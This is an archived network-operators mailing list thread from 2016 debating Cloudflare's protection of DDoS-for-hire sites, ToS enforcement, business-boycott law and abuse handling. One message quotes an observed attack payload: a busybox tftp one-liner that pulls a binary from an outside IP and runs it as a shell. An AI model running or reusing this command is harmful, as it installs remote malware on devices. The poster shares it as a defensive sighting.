Re: Cloudflare, dirty networks and politricks

[John]

On 2016-08-01 13:20, Baldur Norddahl wrote:
> On 2016-07-31 05:46, Randy Bush wrote:
>>> This is silly. Anyone is of course allowed to deny service to parties
>>> involved in obvious criminal activity.
>> so block cloudflare from your network and go back to work already.
>>
>> randy

> I do believe that most of us on this list have cause to do that civil
> lawsuit, especially if it was done as a class action. But I just own a
> small company that is not even based in the US, so I am not going to
> be the hero that funds it. Instead I will do what I can to warn
> everyone off this company.
>
> Regards,
>
> Baldur
I think even you will win in court

Russian government since a while implemented country-wide blocklist. It is
transparent and available online, and there
is a lot of cloudflare ip's (http://reestr.rublacklist.net/api/ips). First
i thought, again Putin's regime crack on freedom, but after viewing
specific cloudflare subnet as example (
http://reestr.rublacklist.net/search/1?q=104.16.) i can say, major part of
websites are online gambling, and many of them have court decisions. There
is also some ISIL propaganda, questionable nudes of underage (they pretend
to be art), drug dealers forums (all in russian language) and etc.
As far as i know russians send first abuse letter, and if such content is
not removed in reasonable terms - they block resource on "russian
firewall". And i believe ignorance hurts cloudflare business in Russia, but
do they care?
I may understand much more proper position of google, for example if they
receive court order from Russia - they block this particular content in
Russia only. But they wont back on their position on free speech. And they
are able to clearly draw a line between free speech and criminals.
Ok, let's say on booters no court decision and it is gray area. But
providing connectivity for terrorists propaganda or very questionable
content - beyond my understanding. Sure i leave chance that they didn't
received notification from officials, but at least now they are aware about
this.

Re: Cloudflare, dirty networks and politricks

[Alain Hebert]

While on that subject,

( And by pure coincidence )

Here is a little attempt of exploiting  overflow (dnsmasq maybe)
using OVH as a payload distribution

 cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g
91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh

Obviously that host is not accessible at the moment. (GG OVH?)

I'm suspecting that the CC used to create that VM got declined on
the 1st, which is often the case for payload distribution.

-
Alain Hebertaheb...@pubnix.net   
PubNIX Inc.
50 boul. St-Charles
P.O. Box 26770 Beaconsfield, Quebec H9W 6G7
Tel: 514-990-5911  http://www.pubnix.netFax: 514-990-9443

On 08/01/16 07:33, Randy Bush wrote:
>>> so block cloudflare from your network and go back to work already.
>> What is that supposed to accomplish? Cloudflare will still be helping 
>> selling DDoS attacks on my network.
>>
>> No it is not the same as asking Cloudflare to do the sensible thing:
> and how is that working out for you?
>
> all that is happening is the subject that won't die is being a dos on
> this list (yes, including this response)
>
> randy
>

Re: Cloudflare, dirty networks and politricks

[Randy Bush]

>> so block cloudflare from your network and go back to work already.
> 
> What is that supposed to accomplish? Cloudflare will still be helping 
> selling DDoS attacks on my network.
> 
> No it is not the same as asking Cloudflare to do the sensible thing:

and how is that working out for you?

all that is happening is the subject that won't die is being a dos on
this list (yes, including this response)

randy

Re: Cloudflare, dirty networks and politricks

[Baldur Norddahl]

On 2016-07-31 05:46, Randy Bush wrote:

This is silly. Anyone is of course allowed to deny service to parties
involved in obvious criminal activity.

so block cloudflare from your network and go back to work already.

randy


What is that supposed to accomplish? Cloudflare will still be helping 
selling DDoS attacks on my network.


No it is not the same as asking Cloudflare to do the sensible thing:

Cloudflare profits on DDoS attacks. We are the victims.

Cloudflare can dump just the obvious criminal customers. The ones they 
got abuse complaints about so they know which ones to look at. If we 
block Cloudflare there will be collateral damage to all legit Cloudflare 
customers and our own customers using services from legit Cloudflare 
customers.


Asking me to do anything at all is like telling the rape victim to take 
care of the problem herself. Cloudflare is the wrongdoing party here, 
not us.


Blocking Cloudflare does not stop the attacks. If Cloudflare stops 
offering protection service to booters, those sites will find it very 
hard to find alternatives. There is a reason they all are using 
Cloudflare. Thus if Cloudflare boots the booters we will very likely see 
a decrease in attacks.


My preferred solution is that management of Cloudflare decides to make 
their company a honest outfit again. Failing that, I would like law 
enforcement to coerce them into becoming a honest outfit. Failing that, 
I would want a judge in a civil lawsuit coerce them.


I do believe that most of us on this list have cause to do that civil 
lawsuit, especially if it was done as a class action. But I just own a 
small company that is not even based in the US, so I am not going to be 
the hero that funds it. Instead I will do what I can to warn everyone 
off this company.


Regards,

Baldur

Re: Cloudflare, dirty networks and politricks

[bzs]

Besides legal costs I've informed customers that I will charge them
(insert billable hourly rate) for any complaints or similar our staff
has to field beyond what we'd consider a normal volume which is pretty
low.

One guy who wasn't quite to the level of spamming as usually
conceived, not in intent, but ran a professional content list but had
a bad habit of wholesale adding mail addresses -- this was quite a
while ago when such things weren't so clear. I finally billed him
~$1,000 after several warnings and he paid it and said he understood
that our time is worth money.

I kind of felt bad because I didn't believe his intentions were in any
way malicious. Mostly he'd scrape similarly themed lists and websites,
but we really were getting quite a few complaints per day some which
merited responses...and he did run the list to promote his own
consulting. But at some point time really is money.

I suppose that sort of thing could be used in a case like this where
someone hosts a web site of questionable intent but never uses your
service to actually do anything questionable. If it incurs you costs
such as telling people you're not the right party it seems reasonable
to expect reimbursement. I think the law uses the term "attractive
nuisance".

Which of course leads to shutting someone down if they refuse to pay.
Again you've reduced it to just a credit or payment issue rather than
citing the content specifically other than perhaps as an explanation
why you're getting too many complaints.

-- 
-Barry Shein

Software Tool & Die| b...@theworld.com | http://www.TheWorld.com
Purveyors to the Trade | Voice: +1 617-STD-WRLD   | 800-THE-WRLD
The World: Since 1989  | A Public Information Utility | *oo*

Re: Cloudflare, dirty networks and politricks

[Rich Kulawiec]

On Sat, Jul 30, 2016 at 03:34:32PM -0400, b...@theworld.com wrote:
> I don't know if one can write a ToS which says you will be shut down
> if you harm another party utilizing another party's services but not
> otherwise involving us. Well, you can write anything but is it lawful
> and enforceable?

Yes.  And it doesn't require that the activity be illegal, which is
a good thing because of what most of us recognize as abusive may or
may not be illegal depending on which legal professional is interpreting
the law, which law they're interpreting, and what jurisidction(s) apply.

I fired an 11-year customer in under an hour when I discovered them
spamming via one of the numerous spammers-for-hire out there.  This
activity had nothing to do with the services I was providing them,
but it fell under the provision that said (abbreviating liberally
from the legalese) "if you spam from anywhere, you're toast".
I didn't like doing it to a longtime customer, particularly because
they happened to be my biggest customer, but I did...because it
was the right thing to do, and because I had made it crystal-clear
to them when they signed on that I would do it without hesitation.

I expect the same from everyone else.  If I can do it without
the budgets, staff, and legal departments that so many far larger
operations enjoy, then so can they.  It's just a question of whether
or not they recognize their ethical, professional obligation to
the rest of the Internet and are willing to put that ahead of profit.

---rsk

Re: Cloudflare, dirty networks and politricks

[Randy Bush]

> This is silly. Anyone is of course allowed to deny service to parties
> involved in obvious criminal activity.

so block cloudflare from your network and go back to work already.

randy

Re: Cloudflare, dirty networks and politricks

[Owen DeLong]

> On Jul 30, 2016, at 12:34 PM, b...@theworld.com wrote:
> 
> 
> On July 30, 2016 at 10:51 o...@delong.com  (Owen 
> DeLong) wrote:
>> If they are using a website hosted or accelerated by your CDN to advertise
>> an illegal activity or an activity in violation of your ToS, then if you
>> have written your ToS properly, you are free to shut down said site (or
>> at least your portions of it) based on their violation of your ToS.
> 
> Well, yes, of course, which is why I suggested developing generally
> agreed upon definitions and writing them into contracts.
> 
> One can't really write a useful contract if terms aren't well defined.
> 
>> 
>> That’s not a business boycott because you didn’t conspire with their other
>> providers to shut it down, you took an independent action based on your
>> own ToS.
> 
> The issue arises if you shut them down when you're not the harmed or
> involved party.

Not if they are using your service in a way that is contrary to the agreement
they have signed.

> I don't know if one can write a ToS which says you will be shut down
> if you harm another party utilizing another party's services but not
> otherwise involving us. Well, you can write anything but is it lawful
> and enforceable?

Probably not, but you wouldn’t do that anyway.

What you would write instead is that “You shall not use the service to
carry out attacks or other malicious activity, nor shall you use the
service to advertise, solicit, or contract to carry out such actions even
if the actions themselves are carried out independent of the service.”

You can, of course, prohibit any action you want on your network, even
if the prohibited action isn’t the actual objectionable action.

> In some cases where that sort of thing has come up I've turned it into
> a credit relationship which has greater leeway.
> 
> Something like:
> 
>  It has come to our attention that you are engaged in activities,
>  even if not thus far involving our services, which might incur us
>  legal fees. Consequently we require a deposit to cover those legal
>  fees, in advance, of $10,000 [pick a number] with the understanding
>  that any such legal fees will be billable in full even if above and
>  beyond that $10,000 deposit. Since I extend you no credit a failure
>  to provide that deposit by [date in the near future] will result in
>  termination of services. Please feel free to contact us with any
>  questions or concerns.

Here you risk running up against a claim that this new requirement
is a change to the ToS which they haven’t agreed to and which,
depending on how well they negotiated the contract may not be
enforceable until it comes time for contract renewal and you add
this deposit to the terms of the new contract.

> but consult your attorney, state and local regulations and your own
> ToS and corporate organization may affect how and whether you can do
> that sort of thing or exactly how it has to be architected.

Always.

> If one wants to one can include demand for indemnification with
> evidence of ability to indemnify and/or business insurance policies
> where you've been written in as a legitimate potential claimant for
> legal fees and damages assuming the business insurance policy covers
> that but as I said you need a lawyer to suss that out.

Sure, but it’s questionable whether the aggrieved party has any legitimate
claim against the hosting company that merely hosted the site that
advertised the DDOS service in question.

Much easier to just prohibit advertising such a service in the first
place, IMHO.

> They probably could still fight with you over all that if none of it
> was anticipated in your ToS (hint: might be something to add to a ToS,
> reserving the right to...blah blah.) Or even try to perfect an
> argument based on some theory of estoppel (you changed the conditions
> in a way which harms me the client.)
> 
> More likely they'll ask for time and assistance to leave your service
> (in my experience), generally what you actually wanted. Buh-bye!

Yep… Unless they’re starting to run out of options.

>> There’s fairly wide latitude to “reserve the right to refuse service to
>> anyone”, especially if you can show that their use of said service is
>> in violation of the contract(s) applicable to that service.
> 
> Yeah well as any lawyer will tell you relying on broad principles like
> that rather than specifying covenants is just asking for legal fees :-)

Sure, but my point is that specifically spelling out certain actions that
you refuse to provide service to is usually the easiest way to terminate
someone for committing such actions on your service.

Owen

> 
>> 
>> Owen
>> 
>>> On Jul 29, 2016, at 12:36 , b...@theworld.com wrote:
>>> 
>>> 
>>> Unfortunately that raises the issue of what's generally termed in law
>>> a "business boycott" which is at least tortiable if not illegal.
>>> 
>>> The grocer can't agree with your landlord not to sell you food until
>>> you catch up on 

Re: Cloudflare, dirty networks and politricks

[Baldur Norddahl]

This is silly. Anyone is of course allowed to deny service to parties
involved in obvious criminal activity. Moreover, Cloudflare benefits from
this illegal activity that they allow on their service. In addition most
other services disallow the same illegal sites. This can only lead to one
conclusion.

Regards

Baldur

Den 30. jul. 2016 21.36 skrev :

>
> On July 30, 2016 at 10:51 o...@delong.com (Owen DeLong) wrote:
>  > If they are using a website hosted or accelerated by your CDN to
> advertise
>  > an illegal activity or an activity in violation of your ToS, then if you
>  > have written your ToS properly, you are free to shut down said site (or
>  > at least your portions of it) based on their violation of your ToS.
>
> Well, yes, of course, which is why I suggested developing generally
> agreed upon definitions and writing them into contracts.
>
> One can't really write a useful contract if terms aren't well defined.
>
>  >
>  > That’s not a business boycott because you didn’t conspire with their
> other
>  > providers to shut it down, you took an independent action based on your
>  > own ToS.
>
> The issue arises if you shut them down when you're not the harmed or
> involved party.
>
> I don't know if one can write a ToS which says you will be shut down
> if you harm another party utilizing another party's services but not
> otherwise involving us. Well, you can write anything but is it lawful
> and enforceable?
>
> In some cases where that sort of thing has come up I've turned it into
> a credit relationship which has greater leeway.
>
> Something like:
>
>   It has come to our attention that you are engaged in activities,
>   even if not thus far involving our services, which might incur us
>   legal fees. Consequently we require a deposit to cover those legal
>   fees, in advance, of $10,000 [pick a number] with the understanding
>   that any such legal fees will be billable in full even if above and
>   beyond that $10,000 deposit. Since I extend you no credit a failure
>   to provide that deposit by [date in the near future] will result in
>   termination of services. Please feel free to contact us with any
>   questions or concerns.
>
> but consult your attorney, state and local regulations and your own
> ToS and corporate organization may affect how and whether you can do
> that sort of thing or exactly how it has to be architected.
>
> If one wants to one can include demand for indemnification with
> evidence of ability to indemnify and/or business insurance policies
> where you've been written in as a legitimate potential claimant for
> legal fees and damages assuming the business insurance policy covers
> that but as I said you need a lawyer to suss that out.
>
> They probably could still fight with you over all that if none of it
> was anticipated in your ToS (hint: might be something to add to a ToS,
> reserving the right to...blah blah.) Or even try to perfect an
> argument based on some theory of estoppel (you changed the conditions
> in a way which harms me the client.)
>
> More likely they'll ask for time and assistance to leave your service
> (in my experience), generally what you actually wanted. Buh-bye!
>
>  >
>  > There’s fairly wide latitude to “reserve the right to refuse service to
>  > anyone”, especially if you can show that their use of said service is
>  > in violation of the contract(s) applicable to that service.
>
> Yeah well as any lawyer will tell you relying on broad principles like
> that rather than specifying covenants is just asking for legal fees :-)
>
>  >
>  > Owen
>  >
>  > > On Jul 29, 2016, at 12:36 , b...@theworld.com wrote:
>  > >
>  > >
>  > > Unfortunately that raises the issue of what's generally termed in law
>  > > a "business boycott" which is at least tortiable if not illegal.
>  > >
>  > > The grocer can't agree with your landlord not to sell you food until
>  > > you catch up on the rent.
>  > >
>  > > They can agree to use this information to refuse you credit but even
>  > > that's quite constrained by law even if often done anyhow. And that's
>  > > a credit relationship so different.
>  > >
>  > > I went over this with my attorney when another ISP asked me to shut a
>  > > customer's account down because they were spamming them from a third
>  > > ISP's account.
>  > >
>  > > I asked to look at the emails (spam) in question and none originated
>  > > at our site. The acct in question on my site didn't do anything
>  > > problematic that I could find.
>  > >
>  > > My lawyer explained the above to me: You can't do that, business
>  > > boycott.
>  > >
>  > > The other ISP (specifically a sysadmin) who'd asked me to shut the
>  > > acct got so angry at this response, he took it all very personally and
>  > > unprofessionally, that I had to bring in his own legal dept to explain
>  > > this to him which he of course took as a further affront. It got ugly
>  > > but you don't need the details.
>  > >
>  > > That's the problem 

Re: Cloudflare, dirty networks and politricks

[bzs]

On July 30, 2016 at 10:51 o...@delong.com (Owen DeLong) wrote:
 > If they are using a website hosted or accelerated by your CDN to advertise
 > an illegal activity or an activity in violation of your ToS, then if you
 > have written your ToS properly, you are free to shut down said site (or
 > at least your portions of it) based on their violation of your ToS.

Well, yes, of course, which is why I suggested developing generally
agreed upon definitions and writing them into contracts.

One can't really write a useful contract if terms aren't well defined.

 > 
 > That’s not a business boycott because you didn’t conspire with their other
 > providers to shut it down, you took an independent action based on your
 > own ToS.

The issue arises if you shut them down when you're not the harmed or
involved party.

I don't know if one can write a ToS which says you will be shut down
if you harm another party utilizing another party's services but not
otherwise involving us. Well, you can write anything but is it lawful
and enforceable?

In some cases where that sort of thing has come up I've turned it into
a credit relationship which has greater leeway.

Something like:

  It has come to our attention that you are engaged in activities,
  even if not thus far involving our services, which might incur us
  legal fees. Consequently we require a deposit to cover those legal
  fees, in advance, of $10,000 [pick a number] with the understanding
  that any such legal fees will be billable in full even if above and
  beyond that $10,000 deposit. Since I extend you no credit a failure
  to provide that deposit by [date in the near future] will result in
  termination of services. Please feel free to contact us with any
  questions or concerns.

but consult your attorney, state and local regulations and your own
ToS and corporate organization may affect how and whether you can do
that sort of thing or exactly how it has to be architected.

If one wants to one can include demand for indemnification with
evidence of ability to indemnify and/or business insurance policies
where you've been written in as a legitimate potential claimant for
legal fees and damages assuming the business insurance policy covers
that but as I said you need a lawyer to suss that out.

They probably could still fight with you over all that if none of it
was anticipated in your ToS (hint: might be something to add to a ToS,
reserving the right to...blah blah.) Or even try to perfect an
argument based on some theory of estoppel (you changed the conditions
in a way which harms me the client.)

More likely they'll ask for time and assistance to leave your service
(in my experience), generally what you actually wanted. Buh-bye!

 > 
 > There’s fairly wide latitude to “reserve the right to refuse service to
 > anyone”, especially if you can show that their use of said service is
 > in violation of the contract(s) applicable to that service.

Yeah well as any lawyer will tell you relying on broad principles like
that rather than specifying covenants is just asking for legal fees :-)

 > 
 > Owen
 > 
 > > On Jul 29, 2016, at 12:36 , b...@theworld.com wrote:
 > > 
 > > 
 > > Unfortunately that raises the issue of what's generally termed in law
 > > a "business boycott" which is at least tortiable if not illegal.
 > > 
 > > The grocer can't agree with your landlord not to sell you food until
 > > you catch up on the rent.
 > > 
 > > They can agree to use this information to refuse you credit but even
 > > that's quite constrained by law even if often done anyhow. And that's
 > > a credit relationship so different.
 > > 
 > > I went over this with my attorney when another ISP asked me to shut a
 > > customer's account down because they were spamming them from a third
 > > ISP's account.
 > > 
 > > I asked to look at the emails (spam) in question and none originated
 > > at our site. The acct in question on my site didn't do anything
 > > problematic that I could find.
 > > 
 > > My lawyer explained the above to me: You can't do that, business
 > > boycott.
 > > 
 > > The other ISP (specifically a sysadmin) who'd asked me to shut the
 > > acct got so angry at this response, he took it all very personally and
 > > unprofessionally, that I had to bring in his own legal dept to explain
 > > this to him which he of course took as a further affront. It got ugly
 > > but you don't need the details.
 > > 
 > > That's the problem with all this folksy armchair "law", it's often
 > > very bad advice and based on the assumption that the law must agree
 > > with one's emotional feelings. Good luck with that.
 > > 
 > > On July 29, 2016 at 08:08 r...@gsp.org (Rich Kulawiec) wrote:
 > >> On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
 > >>> If we want to be accurate about it, Cloudflare doesn???t host the DDoS,
 > >>> they protect the website of seller of the product. We shouldn???t be
 > >>> de-peering Cloud Flare over sites they protect any more 

Re: Cloudflare, dirty networks and politricks

[Owen DeLong]

If they are using a website hosted or accelerated by your CDN to advertise
an illegal activity or an activity in violation of your ToS, then if you
have written your ToS properly, you are free to shut down said site (or
at least your portions of it) based on their violation of your ToS.

That’s not a business boycott because you didn’t conspire with their other
providers to shut it down, you took an independent action based on your
own ToS.

There’s fairly wide latitude to “reserve the right to refuse service to
anyone”, especially if you can show that their use of said service is
in violation of the contract(s) applicable to that service.

Owen

> On Jul 29, 2016, at 12:36 , b...@theworld.com wrote:
> 
> 
> Unfortunately that raises the issue of what's generally termed in law
> a "business boycott" which is at least tortiable if not illegal.
> 
> The grocer can't agree with your landlord not to sell you food until
> you catch up on the rent.
> 
> They can agree to use this information to refuse you credit but even
> that's quite constrained by law even if often done anyhow. And that's
> a credit relationship so different.
> 
> I went over this with my attorney when another ISP asked me to shut a
> customer's account down because they were spamming them from a third
> ISP's account.
> 
> I asked to look at the emails (spam) in question and none originated
> at our site. The acct in question on my site didn't do anything
> problematic that I could find.
> 
> My lawyer explained the above to me: You can't do that, business
> boycott.
> 
> The other ISP (specifically a sysadmin) who'd asked me to shut the
> acct got so angry at this response, he took it all very personally and
> unprofessionally, that I had to bring in his own legal dept to explain
> this to him which he of course took as a further affront. It got ugly
> but you don't need the details.
> 
> That's the problem with all this folksy armchair "law", it's often
> very bad advice and based on the assumption that the law must agree
> with one's emotional feelings. Good luck with that.
> 
> On July 29, 2016 at 08:08 r...@gsp.org (Rich Kulawiec) wrote:
>> On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
>>> If we want to be accurate about it, Cloudflare doesn???t host the DDoS,
>>> they protect the website of seller of the product. We shouldn???t be
>>> de-peering Cloud Flare over sites they protect any more than we would
>>> de-peer GoDaddy over sites they host, some of which, no doubt, sell
>>> gray/black market/illegal items/services.
>> 
>> This strategy fails for two reasons.
>> 
>> First, nobody gets a pass.  Anybody providing services to abusers
>> needs to cut them off, whether it's a registrar, a web host, an email
>> provider, a DNS provider, or anything else.  Nobody gets to shrug it
>> off with "Well, but..."
>> 
>> Second, nobody *can* get a pass, because the people behind these operations
>> have long since learned to distribute their assets widely -- in an attempt
>> to avoid exactly the actions in the first point.  And you know what?
>> It works.  "We're just hosting their email", says X, and "We're just
>> hosting their DNS", says Y, and "We're just hosting their web site",
>> says Z, and none of them do anything, and nothing gets done. 
>> 
>> The only way to make action against them effective is to do it broadly,
>> do it swiftly, and do it permanently.
>> 
>> ---rsk
> 
> -- 
>-Barry Shein
> 
> Software Tool & Die| b...@theworld.com | 
> http://www.TheWorld.com
> Purveyors to the Trade | Voice: +1 617-STD-WRLD   | 800-THE-WRLD
> The World: Since 1989  | A Public Information Utility | *oo*

Re: Cloudflare, dirty networks and politricks

[Valdis . Kletnieks]

On Fri, 29 Jul 2016 07:50:09 -0500, "J. Oquendo" said:

> In my ramblings on "Why network operators love filth", I
> associate a landlord that knowingly allows his/her tenant
> to sell drugs. In America, your house is gone. This should
> be the case on the Internet as well.

Oh, do *NOT* go there.  In America, "Civil forfeiture" is a *major*
out-of-control problem, because it is *not* done with any sort of judicial
review *at all*.  The police department simply seizes your house/car/etc
on *suspicion* of being involved with drugs or whatever - there doesn't
even need to be an arrest of anybody.

That's right - they can suspect you of dealing drugs, but not have enough
evidence to arrest you.  But they can take your car away anyhow.  It's
called "stop and seize".

They can take your car away because you loaned it to your brother-in-law
to go shopping, because they suspect *he* deals drugs.  The car doesn't
have to be involved in travelling to a drug deal.

Oh, and in most cases, the police department gets to *keep* the proceeds
(money, cars - often sold at auction for more money, etc) of the forfeiture.
This of course makes their budget look better.

The end result - in the US, in 2014, the police took more money and assets
from people than all the reported robberies for the year.

http://www.zerohedge.com/news/2015-11-17/police-civil-asset-forfeitures-exceed-value-all-burglaries-2014

I sincerely *hope* that isn't how you want a global Internet run.


pgp775_7fN4CA.pgp
Description: PGP signature

Re: Cloudflare, dirty networks and politricks

[bzs]

Unfortunately that raises the issue of what's generally termed in law
a "business boycott" which is at least tortiable if not illegal.

The grocer can't agree with your landlord not to sell you food until
you catch up on the rent.

They can agree to use this information to refuse you credit but even
that's quite constrained by law even if often done anyhow. And that's
a credit relationship so different.

I went over this with my attorney when another ISP asked me to shut a
customer's account down because they were spamming them from a third
ISP's account.

I asked to look at the emails (spam) in question and none originated
at our site. The acct in question on my site didn't do anything
problematic that I could find.

My lawyer explained the above to me: You can't do that, business
boycott.

The other ISP (specifically a sysadmin) who'd asked me to shut the
acct got so angry at this response, he took it all very personally and
unprofessionally, that I had to bring in his own legal dept to explain
this to him which he of course took as a further affront. It got ugly
but you don't need the details.

That's the problem with all this folksy armchair "law", it's often
very bad advice and based on the assumption that the law must agree
with one's emotional feelings. Good luck with that.

On July 29, 2016 at 08:08 r...@gsp.org (Rich Kulawiec) wrote:
 > On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
 > > If we want to be accurate about it, Cloudflare doesn???t host the DDoS,
 > > they protect the website of seller of the product. We shouldn???t be
 > > de-peering Cloud Flare over sites they protect any more than we would
 > > de-peer GoDaddy over sites they host, some of which, no doubt, sell
 > > gray/black market/illegal items/services.
 > 
 > This strategy fails for two reasons.
 > 
 > First, nobody gets a pass.  Anybody providing services to abusers
 > needs to cut them off, whether it's a registrar, a web host, an email
 > provider, a DNS provider, or anything else.  Nobody gets to shrug it
 > off with "Well, but..."
 > 
 > Second, nobody *can* get a pass, because the people behind these operations
 > have long since learned to distribute their assets widely -- in an attempt
 > to avoid exactly the actions in the first point.  And you know what?
 > It works.  "We're just hosting their email", says X, and "We're just
 > hosting their DNS", says Y, and "We're just hosting their web site",
 > says Z, and none of them do anything, and nothing gets done. 
 > 
 > The only way to make action against them effective is to do it broadly,
 > do it swiftly, and do it permanently.
 > 
 > ---rsk

-- 
-Barry Shein

Software Tool & Die| b...@theworld.com | http://www.TheWorld.com
Purveyors to the Trade | Voice: +1 617-STD-WRLD   | 800-THE-WRLD
The World: Since 1989  | A Public Information Utility | *oo*

Re: Cloudflare, dirty networks and politricks

[Hugo Slabbert]

On Fri 2016-Jul-29 07:50:09 -0500, J. Oquendo  wrote:


On Fri, 29 Jul 2016, Rich Kulawiec wrote:


On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
> If we want to be accurate about it, Cloudflare doesn???t host the DDoS,
> they protect the website of seller of the product. We shouldn???t be
> de-peering Cloud Flare over sites they protect any more than we would
> de-peer GoDaddy over sites they host, some of which, no doubt, sell
> gray/black market/illegal items/services.

The only way to make action against them effective is to do it broadly,
do it swiftly, and do it permanently.



In my ramblings on "Why network operators love filth", I
associate a landlord that knowingly allows his/her tenant
to sell drugs. In America, your house is gone. This should
be the case on the Internet as well. Keep sending out crap
and ARIN should yank your IP space after everyone else
has de-peered you.

So let's get to these horrible analogies of "weapons" and
whether or not CloudFlare is solely the gun manufacturer
and is not responsible whether or not their ARCLOUD rifle
was used to shoot up a school killing children.

Analogy: Hotel Cloud is a pretty big hotel in the city.
They have 5,000 rooms. When you walk by, their tenants
are throwing rocks out of the windows, garbage, etc.
People complain to the hotel management that does nothing
about it. Hotel Cloud's response is: 'Well this is really
not our problem, we only rent a room, what the occupant
does...' --- And this makes sense to how many of you who'd
respond: "Well I don't know about you but I want to walk
around freely" Freely? At some point in time, you WILL
walk by this hotel, or another that WILL become just like
it. Why? Because there will be no one to say: "Hey this
is wrong buck stops here..."

I have seen these discussions on this list for so many
years, and there are those that want to do good, but won't
lift a finger out of fear of the herd/praetorian guard.
Anyone saying it cannot be done, is a coward bowing to
the dollar (euro/yen/whatever). The analogy above is spot
on...


This may seem pedantic, but no it's not, at least not in the Cloudflare 
situation.  In the Hotel Cloudflare example, the miscreants don't hurl the 
rocks and filth out of the hotels' windows.  They set up a storefront/shop 
in the hotel to sell rock- and filth-slinging for hire, with the actual 
rock- and filth-flinging being done elsewhere.


That said:

I don't believe the hotel can turn a blind eye to rock- and filth-slinging 
being peddled from their premises without consequence.  If we caught 
someone running a booter web storefront on our net, they'd be gone.  And 
the premises from which rock- and filth-slinging occurs (networks that 
originate garbage traffic, especially those that permit source address 
spoofing) also need to be held accountable.


Again: not disagreeing that we need to hold people accountable; just 
clarifying the analogy for this case.


I've cut off service for customer gear that was spewing garbage where they 
failed to do anything about it.  We generally give an initial grace period 
and assist the customer however we can in getting their stuff cleaned up 
(or try to drop just the abusive traffic to start and leave the rest of 
their feed).  But if you keep getting repeatedly compromised, fail to 
protect your stuff or clean it up, and keep spewing ever more varied 
garbage, you've proven yourself incapable of running an Internet-facing 
service and I'll quit trying to play whack-a-mole and just drop you.


And yes:
BCP38: we haz it.

We're not at the scale of the big boys, but we try to do our part to run a 
clean shop.



...with the only difference being a hotel is physical,
and on the Interwebs, out of sight out of mind. 



This is until one of your relatives' sites gets taken offline by
some bored moron via DDoS, and there go their sales, there
goes their business. THEN and only THEN will some of the
naysayers say: "Shit we could have stopped it."

Do you need law enforcement to be moral? "I can see
that person is getting pulverized by some drunken idiot
better not intervene because well... I want to walk
freely..." That beating can come full circle, where
beating can be DDoS, a sophisticated attack, malware.

I am so tempted to start a shaming site for networks
including all of the big boys with detailed records
showing how abuse was contacted, no one did nothing,
and oh by the way... "Are you sure you want to host
or transit with this company? Last I checked via
logs, they were a filthy network that catered to
peds, RBN folk, etc" Maybe when some of you guys
(that sit around twiddling fingers) see your companies
all over the place, maybe then you'll think about doing
the right thing.


--
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

Re: Cloudflare, dirty networks and politricks

[J. Oquendo]

On Fri, 29 Jul 2016, Rich Kulawiec wrote:

> On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
> > If we want to be accurate about it, Cloudflare doesn???t host the DDoS,
> > they protect the website of seller of the product. We shouldn???t be
> > de-peering Cloud Flare over sites they protect any more than we would
> > de-peer GoDaddy over sites they host, some of which, no doubt, sell
> > gray/black market/illegal items/services.
> 
> The only way to make action against them effective is to do it broadly,
> do it swiftly, and do it permanently.
> 

In my ramblings on "Why network operators love filth", I
associate a landlord that knowingly allows his/her tenant
to sell drugs. In America, your house is gone. This should
be the case on the Internet as well. Keep sending out crap
and ARIN should yank your IP space after everyone else
has de-peered you.

So let's get to these horrible analogies of "weapons" and
whether or not CloudFlare is solely the gun manufacturer
and is not responsible whether or not their ARCLOUD rifle
was used to shoot up a school killing children.

Analogy: Hotel Cloud is a pretty big hotel in the city.
They have 5,000 rooms. When you walk by, their tenants
are throwing rocks out of the windows, garbage, etc.
People complain to the hotel management that does nothing
about it. Hotel Cloud's response is: 'Well this is really
not our problem, we only rent a room, what the occupant
does...' --- And this makes sense to how many of you who'd
respond: "Well I don't know about you but I want to walk
around freely" Freely? At some point in time, you WILL
walk by this hotel, or another that WILL become just like
it. Why? Because there will be no one to say: "Hey this
is wrong buck stops here..."

I have seen these discussions on this list for so many
years, and there are those that want to do good, but won't
lift a finger out of fear of the herd/praetorian guard.
Anyone saying it cannot be done, is a coward bowing to
the dollar (euro/yen/whatever). The analogy above is spot
on, with the only difference being a hotel is physical,
and on the Interwebs, out of sight out of mind. This is
until one of your relatives' sites gets taken offline by
some bored moron via DDoS, and there go their sales, there
goes their business. THEN and only THEN will some of the
naysayers say: "Shit we could have stopped it."

Do you need law enforcement to be moral? "I can see
that person is getting pulverized by some drunken idiot
better not intervene because well... I want to walk
freely..." That beating can come full circle, where
beating can be DDoS, a sophisticated attack, malware.

I am so tempted to start a shaming site for networks
including all of the big boys with detailed records
showing how abuse was contacted, no one did nothing,
and oh by the way... "Are you sure you want to host
or transit with this company? Last I checked via
logs, they were a filthy network that catered to
peds, RBN folk, etc" Maybe when some of you guys
(that sit around twiddling fingers) see your companies
all over the place, maybe then you'll think about doing
the right thing.


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463

Re: Cloudflare, dirty networks and politricks

[Rich Kulawiec]

On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
> If we want to be accurate about it, Cloudflare doesn???t host the DDoS,
> they protect the website of seller of the product. We shouldn???t be
> de-peering Cloud Flare over sites they protect any more than we would
> de-peer GoDaddy over sites they host, some of which, no doubt, sell
> gray/black market/illegal items/services.

This strategy fails for two reasons.

First, nobody gets a pass.  Anybody providing services to abusers
needs to cut them off, whether it's a registrar, a web host, an email
